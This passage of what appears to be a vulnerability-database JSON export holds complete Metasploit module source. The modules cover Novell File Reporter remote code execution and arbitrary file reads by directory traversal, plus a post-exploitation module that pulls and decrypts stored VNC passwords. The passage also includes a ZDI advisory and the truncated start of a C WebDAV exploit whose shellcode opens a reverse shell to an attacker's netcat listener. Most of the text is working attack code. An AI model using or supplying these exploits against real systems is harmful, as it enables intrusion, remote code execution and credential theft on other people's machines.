MSF_LICENSE,\n 'Author' =>\n [\n 'juan vazquez'\n ],\n 'References' =>\n [\n [ 'CVE', '2012-4959'],\n [ 'OSVDB', '87573' ],\n [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959' ]\n ],\n 'Payload' =>\n {\n 'Space' => 2048,\n 'StackAdjustment' => -3500\n },\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 20\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n #Windows before Vista\n [ 'Automatic', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Nov 16 2012'))\n\n register_options(\n [\n Opt::RPORT(3037),\n OptBool.new('SSL', [true, 'Use SSL', true]),\n OptInt.new('DEPTH', [true, 'Traversal depth', 6])\n ])\n\n self.needs_cleanup = true\n end\n\n def on_new_session(client)\n\n return if not @var_mof_name\n return if not @var_vbs_name\n\n if client.type != \"meterpreter\"\n print_error(\"NOTE: you must use a Meterpreter payload in order to automatically clean up.\")\n print_error(\"The following files must be removed manually:\")\n print_error(\"The VBS payload: %WINDIR%\\\\system32\\\\#{@var_vbs_name}.vbs\")\n print_error(\"The MOF file (%WINDIR%\\\\system32\\\\wbem\\\\mof\\\\good\\\\#{@var_mof_name}.mof)\")\n return # That's it\n end\n\n # stdapi must be loaded before we can use fs.file\n client.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\")\n\n begin\n print_good(\"Deleting the VBS payload \\\"#{@var_vbs_name}.vbs\\\" ...\")\n windir = client.sys.config.getenv('WINDIR')\n client.fs.file.rm(\"#{windir}\\\\system32\\\\\" + @var_vbs_name + \".vbs\")\n print_good(\"Deleting the MOF file \\\"#{@var_mof_name}.mof\\\" ...\")\n cmd = \"#{windir}\\\\system32\\\\attrib.exe -r \" +\n \"#{windir}\\\\system32\\\\wbem\\\\mof\\\\good\\\\\" + @var_mof_name + \".mof\"\n client.sys.process.execute(cmd, nil, {'Hidden' => true })\n client.fs.file.rm(\"#{windir}\\\\system32\\\\wbem\\\\mof\\\\good\\\\\" + @var_mof_name + \".mof\")\n rescue ::Exception => e\n print_error(\"Exception: #{e.inspect}\")\n end\n\n end\n\n def exploit\n\n # In order to save binary data to the file system the payload is written to a .vbs\n # file and execute it from there.\n @var_mof_name = rand_text_alpha(rand(5)+5)\n @var_vbs_name = rand_text_alpha(rand(5)+5)\n\n print_status(\"Encoding payload into VBS...\")\n payload = generate_payload_exe\n vbs_content = Msf::Util::EXE.to_exe_vbs(payload)\n\n print_status(\"Generating VBS file...\")\n mof_content = generate_mof(\"#{@var_mof_name}.mof\", \"#{@var_vbs_name}.vbs\")\n\n print_status(\"Uploading the VBS file\")\n worked = upload_file(\"WINDOWS\\\\system32\\\\#{@var_vbs_name}.vbs\", vbs_content)\n unless worked\n fail_with(Failure::NotVulnerable, \"Failed to upload the file\")\n end\n\n print_status(\"Uploading the MOF file\")\n upload_file(\"WINDOWS\\\\system32\\\\wbem\\\\mof\\\\#{@var_mof_name}.mof\", mof_content)\n end\n\n def upload_file(filename, content)\n traversal = \"..\\\\\" * datastore['DEPTH']\n traversal << filename\n\n record = \"<RECORD><NAME>FSFUI</NAME><UICMD>130</UICMD><FILE>#{traversal}</FILE><![CDATA[#{content}]]></RECORD>\"\n md5 = Rex::Text.md5(\"SRS\" + record + \"SERVER\").upcase\n message = md5 + record\n\n res = send_request_cgi(\n {\n 'uri' => '/FSF/CMD',\n 'version' => '1.1',\n 'method' => 'POST',\n 'ctype' => \"text/xml\",\n 'data' => message\n })\n\n if res and res.code == 200 and res.body.include? \"<RESULT><VERSION>1</VERSION><STATUS>0</STATUS></RESULT>\"\n print_warning(\"File successfully uploaded: #{filename}\")\n else\n print_error(\"Failed to upload the file\")\n return false\n end\n\n true\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/novell/file_reporter_fsfui_upload.rb"}, {"lastseen": "2019-10-22T03:53:15", "bulletinFamily": "exploit", "description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve arbitrary text files via a directory traversal while handling requests to /FSF/CMD with an FSFUI record with UICMD 126. This module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).\n", "modified": "2017-07-24T13:26:21", "published": "2012-11-16T15:03:09", "id": "MSF:AUXILIARY/SCANNER/HTTP/NOVELL_FILE_REPORTER_FSFUI_FILEACCESS", "href": "", "type": "metasploit", "title": "NFR Agent FSFUI Record Arbitrary Remote File Access", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'NFR Agent FSFUI Record Arbitrary Remote File Access',\n 'Description' => %q{\n NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve\n arbitrary text files via a directory traversal while handling requests to /FSF/CMD\n with an FSFUI record with UICMD 126. This module has been tested successfully\n against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File\n Reporter 1.0.1).\n },\n 'References' =>\n [\n [ 'CVE', '2012-4958' ],\n [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959' ]\n ],\n 'Author' =>\n [\n 'juan vazquez'\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => \"Nov 16 2012\"\n )\n\n register_options(\n [\n Opt::RPORT(3037),\n OptBool.new('SSL', [true, 'Use SSL', true]),\n OptString.new('RFILE', [true, 'Remote File', 'windows\\\\win.ini']),\n OptInt.new('DEPTH', [true, 'Traversal depth', 6])\n ])\n\n end\n\n def run_host(ip)\n\n traversal = \"..\\\\\" * datastore['DEPTH']\n record = \"<RECORD><NAME>FSFUI</NAME><UICMD>126</UICMD><FILE>#{traversal}#{datastore['RFILE']}</FILE></RECORD>\"\n md5 = Rex::Text.md5(\"SRS\" + record + \"SERVER\").upcase\n message = md5 + record\n\n print_status(\"Retrieving the file contents\")\n\n res = send_request_cgi(\n {\n 'uri' => '/FSF/CMD',\n 'version' => '1.1',\n 'method' => 'POST',\n 'ctype' => \"text/xml\",\n 'data' => message\n })\n\n if res and res.code == 200 and res.body =~ /<RESULT><VERSION>1<\\/VERSION><STATUS>0<\\/STATUS><CFILE><\\!\\[CDATA\\[(.*)\\]\\]><\\/CFILE><\\/RESULT>/m\n loot = $1\n f = ::File.basename(datastore['RFILE'])\n path = store_loot('novell.filereporter.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])\n print_good(\"#{datastore['RFILE']} saved in #{path}\")\n else\n print_error(\"Failed to retrieve the file contents\")\n end\n end\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb"}, {"lastseen": "2019-12-03T11:40:59", "bulletinFamily": "exploit", "description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve arbitrary files via a request to /FSF/CMD with a SRS Record with OPERATION 4 and CMD 103, specifying a full pathname. This module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).\n", "modified": "2019-03-05T09:38:51", "published": "2012-11-16T15:03:09", "id": "MSF:AUXILIARY/SCANNER/HTTP/NOVELL_FILE_REPORTER_SRS_FILEACCESS", "href": "", "type": "metasploit", "title": "NFR Agent SRS Record Arbitrary Remote File Access", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'NFR Agent SRS Record Arbitrary Remote File Access',\n 'Description' => %q{\n NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve\n arbitrary files via a request to /FSF/CMD with a SRS Record with OPERATION 4 and\n CMD 103, specifying a full pathname. This module has been tested successfully\n against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File\n Reporter 1.0.1).\n },\n 'References' =>\n [\n [ 'CVE', '2012-4957' ],\n [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959' ]\n ],\n 'Author' =>\n [\n 'juan vazquez'\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => \"Nov 16 2012\"\n )\n\n register_options(\n [\n Opt::RPORT(3037),\n OptBool.new('SSL', [true, 'Use SSL', true]),\n OptString.new('RFILE', [true, 'Remote File', 'c:\\\\windows\\\\win.ini'])\n ])\n\n register_autofilter_ports([ 3037 ])\n end\n\n def run_host(ip)\n\n record = \"<RECORD><NAME>SRS</NAME><OPERATION>4</OPERATION><CMD>103</CMD><PATH>#{datastore['RFILE']}</PATH></RECORD>\"\n md5 = Rex::Text.md5(\"SRS\" + record + \"SERVER\").upcase\n message = md5 + record\n\n print_status(\"Retrieving the file contents\")\n\n res = send_request_cgi(\n {\n 'uri' => '/FSF/CMD',\n 'version' => '1.1',\n 'method' => 'POST',\n 'ctype' => \"text/xml\",\n 'data' => message\n })\n\n if res and res.code == 200 and not res.body =~ /<RESULT>/\n loot = res.body\n f = ::File.basename(datastore['RFILE'])\n path = store_loot('novell.filereporter.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])\n print_good(\"#{datastore['RFILE']} saved in #{path}\")\n else\n print_error(\"Failed to retrieve the file contents\")\n end\n end\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb"}, {"lastseen": "2019-11-05T18:21:27", "bulletinFamily": "exploit", "description": "This module extract DES encrypted passwords in known VNC locations\n", "modified": "2017-07-24T13:26:21", "published": "2011-08-10T17:48:30", "id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/VNC", "href": "", "type": "metasploit", "title": "Windows Gather VNC Password Extraction", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\nrequire 'rex/proto/rfb'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n include Msf::Post::Windows::UserProfiles\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Windows Gather VNC Password Extraction',\n 'Description' => %q{\n This module extract DES encrypted passwords in known VNC locations\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Kurt Grutzmacher <grutz[at]jingojango.net>',\n 'mubix'\n ],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n\n end\n\n def decrypt_hash(hash)\n if hash == nil\n return nil\n end\n # fixed des key\n # 5A B2 CD C0 BA DC AF 13\n fixedkey = \"\\x17\\x52\\x6b\\x06\\x23\\x4e\\x58\\x07\"\n pass = Rex::Proto::RFB::Cipher.decrypt [\"#{hash}\"].pack('H*'), fixedkey\n pass.gsub(/\\0/, '')\n end\n\n # Pull encrypted passwords from file based storage\n def file_get(filename,splitvar)\n begin\n client.fs.file.stat(filename)\n config = client.fs.file.new(filename,'r')\n parse = config.read.split\n value = parse.at(parse.index{|x| x =~ /#{splitvar}/}).split(splitvar)[1]\n return value\n rescue\n return nil\n end\n end\n\n\n\n # Pull encrypted passwords from registry based storage\n def reg_get(key,variable)\n begin\n root_key, base_key = session.sys.registry.splitkey(key)\n open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ)\n\n data = open_key.query_value(variable).data\n if data.kind_of? Integer\n return data\n else\n value = data.unpack('H*')[0].to_s\n return value\n end\n rescue\n # Registry value not found\n return nil\n end\n end\n\n def run\n\n '''\n Hash format\n :name,\n :check_file,\n :check_reg,\n :pass_variable,\n :port_variable,\n :port,\n :hash,\n :pass,\n :viewonly_variable,\n :viewonly_hash,\n :viewonly_pass\n '''\n\n locations = []\n\n #Checks\n progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)')\n progfiles_env.each do |k, v|\n next if v.blank?\n locations << {:name => 'UltraVNC',\n :check_file => \"#{v}\\\\UltraVNC\\\\ultravnc.ini\",\n :pass_variable => 'passwd=',\n :viewonly_variable => 'passwd2=',\n :port_variable => 'PortNumber='}\n end\n\n #check uninstall key\n begin\n root_key, base_key = session.sys.registry.splitkey(\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\Ultravnc2_is1\")\n open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)\n vnclocation = open_key.query_value(\"InstallLocation\").data\n locations << {:name => 'UltraVNC',\n :check_file => vnclocation + \"\\\\ultravnc.ini\",\n :pass_variable => 'passwd=',\n :viewonly_variable => 'passwd2=',\n :port_variable => 'PortNumber='}\n rescue Rex::Post::Meterpreter::RequestError => e\n vprint_error(e.message)\n end\n\n locations << {:name => 'WinVNC3_HKLM',\n :check_reg => 'HKLM\\\\Software\\\\ORL\\\\WinVNC3',\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => 'WinVNC3_HKCU',\n :check_reg => 'HKCU\\\\Software\\\\ORL\\\\WinVNC3',\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => 'WinVNC3_HKLM_Default',\n :check_reg => 'HKLM\\\\Software\\\\ORL\\\\WinVNC3\\\\Default',\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => 'WinVNC3_HKCU_Default',\n :check_reg => 'HKCU\\\\Software\\\\ORL\\\\WinVNC3\\\\Default',\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => 'WinVNC_HKLM_Default',\n :check_reg => 'HKLM\\\\Software\\\\ORL\\\\WinVNC\\\\Default',\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => 'WinVNC_HKCU_Default',\n :check_reg => 'HKCU\\\\Software\\\\ORL\\\\WinVNC\\\\Default',\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => 'WinVNC4_HKLM',\n :check_reg => 'HKLM\\\\Software\\\\RealVNC\\\\WinVNC4',\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => 'WinVNC4_HKCU',\n :check_reg => 'HKCU\\\\Software\\\\RealVNC\\\\WinVNC4',\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => 'RealVNC_HKLM',\n :check_reg => 'HKLM\\\\Software\\\\RealVNC\\\\Default',\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => 'RealVNC_HKCU',\n :check_reg => 'HKCU\\\\Software\\\\RealVNC\\\\Default',\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => 'TightVNC_HKLM',\n :check_reg => 'HKLM\\\\Software\\\\TightVNC\\\\Server',\n :pass_variable => 'Password',\n :port_variable => 'RfbPort'}\n\n locations << {:name => 'TightVNC_HKLM_Control_pass',\n :check_reg => 'HKLM\\\\Software\\\\TightVNC\\\\Server',\n :pass_variable => 'ControlPassword',\n :port_variable => 'RfbPort'}\n\n userhives=load_missing_hives()\n userhives.each do |hive|\n next if hive['HKU'] == nil\n locations << {:name => \"RealVNC_#{hive['SID']}\",\n :check_reg => \"#{hive['HKU']}\\\\Software\\\\RealVNC\\\\Default\",\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => \"WinVNC4_#{hive['SID']}\",\n :check_reg => \"#{hive['HKU']}\\\\Software\\\\RealVNC\\\\WinVNC4\",\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => \"WinVNC_#{hive['SID']}_Default\",\n :check_reg => \"#{hive['HKU']}\\\\Software\\\\ORL\\\\WinVNC\\\\Default\",\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => \"WinVNC3_#{hive['SID']}_Default\",\n :check_reg => \"#{hive['HKU']}\\\\Software\\\\ORL\\\\WinVNC3\\\\Default\",\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => \"WinVNC3_#{hive['SID']}\",\n :check_reg => \"#{hive['HKU']}\\\\Software\\\\ORL\\\\WinVNC3\",\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n end\n\n print_status(\"Enumerating VNC passwords on #{sysinfo['Computer']}\")\n\n locations.map { |e|\n vprint_status(\"Checking #{e[:name]}...\")\n if e.has_key?(:check_reg)\n e[:port] = reg_get(e[:check_reg],e[:port_variable])\n e[:hash] = reg_get(e[:check_reg],e[:pass_variable])\n e[:pass] = decrypt_hash(e[:hash])\n if e.has_key?(:viewonly_variable)\n e[:viewonly_hash] = reg_get(e[:check_reg],e[:viewonly_variable])\n e[:viewonly_pass] = decrypt_hash(e[:viewonly_hash])\n end\n elsif e.has_key?(:check_file)\n e[:port] = file_get(e[:check_file],e[:port_variable])\n e[:hash] = file_get(e[:check_file],e[:pass_variable])\n e[:pass] = decrypt_hash(e[:hash])\n if e.has_key?(:viewonly_variable)\n e[:viewonly_hash] = file_get(e[:check_file],e[:viewonly_variable])\n e[:viewonly_pass] = decrypt_hash(e[:viewonly_hash])\n end\n end\n #reporting\n if e[:pass] != nil\n if e[:port] == nil\n e[:port] = 5900\n end\n print_good(\"Location: #{e[:name]} => Hash: #{e[:hash]} => Password: #{e[:pass]} => Port: #{e[:port]}\")\n\n service_data = {\n address: ::Rex::Socket.getaddress(session.sock.peerhost, true),\n port: e[:port],\n service_name: 'vnc',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n # Assemble data about the credential objects we will be creating\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n private_type: :password,\n private_data: \"#{e[:pass]}\"\n }\n\n # Merge the service data into the credential data\n credential_data.merge!(service_data)\n\n # Create the Metasploit::Credential::Core object\n credential_core = create_credential(credential_data)\n\n # Assemble the options hash for creating the Metasploit::Credential::Login object\n login_data ={\n access_level: 'interactive',\n core: credential_core,\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n # Merge in the service data and create our Login\n login_data.merge!(service_data)\n login = create_credential_login(login_data)\n\n end\n if e[:viewonly_pass] != nil\n print_good(\"VIEW ONLY: #{e[:name]} => #{e[:viewonly_hash]} => #{e[:viewonly_pass]} on port: #{e[:port]}\")\n\n service_data = {\n address: ::Rex::Socket.getaddress(session.sock.peerhost, true),\n port: e[:port],\n service_name: 'vnc',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n # Assemble data about the credential objects we will be creating\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n private_type: :password,\n private_data: \"#{e[:viewonly_pass]}\"\n }\n\n # Merge the service data into the credential data\n credential_data.merge!(service_data)\n\n # Create the Metasploit::Credential::Core object\n credential_core = create_credential(credential_data)\n\n # Assemble the options hash for creating the Metasploit::Credential::Login object\n login_data ={\n access_level: 'view_only',\n core: credential_core,\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n # Merge in the service data and create our Login\n login_data.merge!(service_data)\n login = create_credential_login(login_data)\n\n end\n }\n unload_our_hives(userhives)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/vnc.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:36", "bulletinFamily": "software", "description": "Crash on SOAP novell.embox.connmgr.serverinfo action request processing.", "modified": "2010-03-04T00:00:00", "published": "2010-03-04T00:00:00", "id": "SECURITYVULNS:VULN:10670", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10670", "title": "Novell eDirectory DoS", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:33", "bulletinFamily": "software", "description": "ZDI-10-024: Novell eDirectory SOAP Request Parsing Denial of Service\r\nVulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-024\r\nMarch 2, 2010\r\n\r\n-- Affected Vendors:\r\nNovell\r\n\r\n-- Affected Products:\r\nNovell eDirectory\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 8289. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to deny services on\r\nvulnerable installations of Novell eDirectory Server. Authentication is\r\nnot required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the NDS daemon's SOAP service. When a\r\nmalformed request is made to the novell.embox.connmgr.serverinfo SOAP\r\naction, the daemon makes an illegal reference thereby resulting in a\r\ndenial of service.\r\n\r\n\r\n-- Vendor Response:\r\nNovell has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://www.novell.com/support/viewContent.do?externalId=7005341\r\n\r\n-- Disclosure Timeline:\r\n2009-03-13 - Vulnerability reported to vendor\r\n2010-03-02 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * 1c239c43f521145fa8385d64a9c32243\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/", "modified": "2010-03-04T00:00:00", "published": "2010-03-04T00:00:00", "id": "SECURITYVULNS:DOC:23323", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23323", "title": "ZDI-10-024: Novell eDirectory SOAP Request Parsing Denial of Service Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-04-10T00:23:40", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category remote exploits", "modified": "2003-03-23T00:00:00", "published": "2003-03-23T00:00:00", "id": "1337DAY-ID-8289", "href": "https://0day.today/exploit/description/8289", "type": "zdt", "title": "MS Windows WebDAV (ntdll.dll) Remote Exploit", "sourceData": "============================================\r\nMS Windows WebDAV (ntdll.dll) Remote Exploit\r\n============================================\r\n\r\n/*******************************************************************/\r\n/* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */\r\n/* --------------------------------------------------------------- */\r\n/* this is the exploit for ntdll.dll through WebDAV. */\r\n/* run a netcat ex: nc -L -vv -p 666 */\r\n/* wb server.com your_ip 666 0 */\r\n/* the shellcode is a reverse remote shell */\r\n/* you need to pad a bit.. the best way I think is launching */\r\n/* the exploit with pad = 0 and after that, the server will be */\r\n/* down for a couple of seconds, now retry with pad at 1 */\r\n/* and so on..pad 2.. pad 3.. if you haven't the shell after */\r\n/* something like pad at 10 I think you better to restart from */\r\n/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */\r\n/* on all the others servers it was at 2,3,4, etc..sometimes */\r\n/* you can have the force with you, and get the shell in 1 try */\r\n/* sometimes you need to pad more than 10 times ;) */\r\n/* the shellcode was coded by myself, it is SEH + ScanMem to */\r\n/* find the famous offsets (GetProcAddress).. */\r\n/* */\r\n/*******************************************************************/\r\n\r\n\r\n#include <winsock.h>\r\n#include <windows.h>\r\n#include <stdio.h>\r\n\r\n#pragma comment (lib,\"ws2_32\")\r\n\r\nchar shellc0de[] =\r\n\"\\x55\\x8b\\xec\\x33\\xc9\\x53\\x56\\x57\\x8d\\x7d\\xa2\\xb1\\x25\\xb8\\xcc\\xcc\"\r\n\"\\xcc\\xcc\\xf3\\xab\\xeb\\x09\\xeb\\x0c\\x58\\x5b\\x59\\x5a\\x5c\\x5d\\xc3\\xe8\"\r\n\"\\xf2\\xff\\xff\\xff\\x5b\\x80\\xc3\\x10\\x33\\xc9\\x66\\xb9\\xb5\\x01\\x80\\x33\"\r\n\"\\x95\\x43\\xe2\\xfa\\x66\\x83\\xeb\\x67\\xfc\\x8b\\xcb\\x8b\\xf3\\x66\\x83\\xc6\"\r\n\"\\x46\\xad\\x56\\x40\\x74\\x16\\x55\\xe8\\x13\\x00\\x00\\x00\\x8b\\x64\\x24\\x08\"\r\n\"\\x64\\x8f\\x05\\x00\\x00\\x00\\x00\\x58\\x5d\\x5e\\xeb\\xe5\\x58\\xeb\\xb9\\x64\"\r\n\"\\xff\\x35\\x00\\x00\\x00\\x00\\x64\\x89\\x25\\x00\\x00\\x00\\x00\\x48\\x66\\x81\"\r\n\"\\x38\\x4d\\x5a\\x75\\xdb\\x64\\x8f\\x05\\x00\\x00\\x00\\x00\\x5d\\x5e\\x8b\\xe8\"\r\n\"\\x03\\x40\\x3c\\x8b\\x78\\x78\\x03\\xfd\\x8b\\x77\\x20\\x03\\xf5\\x33\\xd2\\x8b\"\r\n\"\\x06\\x03\\xc5\\x81\\x38\\x47\\x65\\x74\\x50\\x75\\x25\\x81\\x78\\x04\\x72\\x6f\"\r\n\"\\x63\\x41\\x75\\x1c\\x81\\x78\\x08\\x64\\x64\\x72\\x65\\x75\\x13\\x8b\\x47\\x24\"\r\n\"\\x03\\xc5\\x0f\\xb7\\x1c\\x50\\x8b\\x47\\x1c\\x03\\xc5\\x8b\\x1c\\x98\\x03\\xdd\"\r\n\"\\x83\\xc6\\x04\\x42\\x3b\\x57\\x18\\x75\\xc6\\x8b\\xf1\\x56\\x55\\xff\\xd3\\x83\"\r\n\"\\xc6\\x0f\\x89\\x44\\x24\\x20\\x56\\x55\\xff\\xd3\\x8b\\xec\\x81\\xec\\x94\\x00\"\r\n\"\\x00\\x00\\x83\\xc6\\x0d\\x56\\xff\\xd0\\x89\\x85\\x7c\\xff\\xff\\xff\\x89\\x9d\"\r\n\"\\x78\\xff\\xff\\xff\\x83\\xc6\\x0b\\x56\\x50\\xff\\xd3\\x33\\xc9\\x51\\x51\\x51\"\r\n\"\\x51\\x41\\x51\\x41\\x51\\xff\\xd0\\x89\\x85\\x94\\x00\\x00\\x00\\x8b\\x85\\x7c\"\r\n\"\\xff\\xff\\xff\\x83\\xc6\\x0b\\x56\\x50\\xff\\xd3\\x83\\xc6\\x08\\x6a\\x10\\x56\"\r\n\"\\x8b\\x8d\\x94\\x00\\x00\\x00\\x51\\xff\\xd0\\x33\\xdb\\xc7\\x45\\x8c\\x44\\x00\"\r\n\"\\x00\\x00\\x89\\x5d\\x90\\x89\\x5d\\x94\\x89\\x5d\\x98\\x89\\x5d\\x9c\\x89\\x5d\"\r\n\"\\xa0\\x89\\x5d\\xa4\\x89\\x5d\\xa8\\xc7\\x45\\xb8\\x01\\x01\\x00\\x00\\x89\\x5d\"\r\n\"\\xbc\\x89\\x5d\\xc0\\x8b\\x9d\\x94\\x00\\x00\\x00\\x89\\x5d\\xc4\\x89\\x5d\\xc8\"\r\n\"\\x89\\x5d\\xcc\\x8d\\x45\\xd0\\x50\\x8d\\x4d\\x8c\\x51\\x6a\\x00\\x6a\\x00\\x6a\"\r\n\"\\x00\\x6a\\x01\\x6a\\x00\\x6a\\x00\\x83\\xc6\\x09\\x56\\x6a\\x00\\x8b\\x45\\x20\"\r\n\"\\xff\\xd0\"\r\n\"CreateProcessA\\x00LoadLibraryA\\x00ws2_32.dll\\x00WSASocketA\\x00\"\r\n\"connect\\x00\\x02\\x00\\x02\\x9A\\xC0\\xA8\\x01\\x01\\x00\"\r\n\"cmd\" // don't change anything..\r\n\"\\x00\\x00\\xe7\\x77\" // offsets of kernel32.dll for some win ver..\r\n\"\\x00\\x00\\xe8\\x77\"\r\n\"\\x00\\x00\\xf0\\x77\"\r\n\"\\x00\\x00\\xe4\\x77\"\r\n\"\\x00\\x88\\x3e\\x04\" // win2k3\r\n\"\\x00\\x00\\xf7\\xbf\" // win9x =P\r\n\"\\xff\\xff\\xff\\xff\";\r\n\r\nint test_host(char *host)\r\n{\r\nchar search[100]=\"\";\r\nint sock;\r\nstruct hostent *heh;\r\nstruct sockaddr_in hmm;\r\nchar buf[100] =\"\";\r\n\r\nif(strlen(host)>60) {\r\nprintf(\"error: victim host too long.\\r\\n\");\r\nreturn 1;\r\n}\r\n\r\nif ((heh = gethostbyname(host))==0){\r\nprintf(\"error: can't resolve '%s'\",host);\r\nreturn 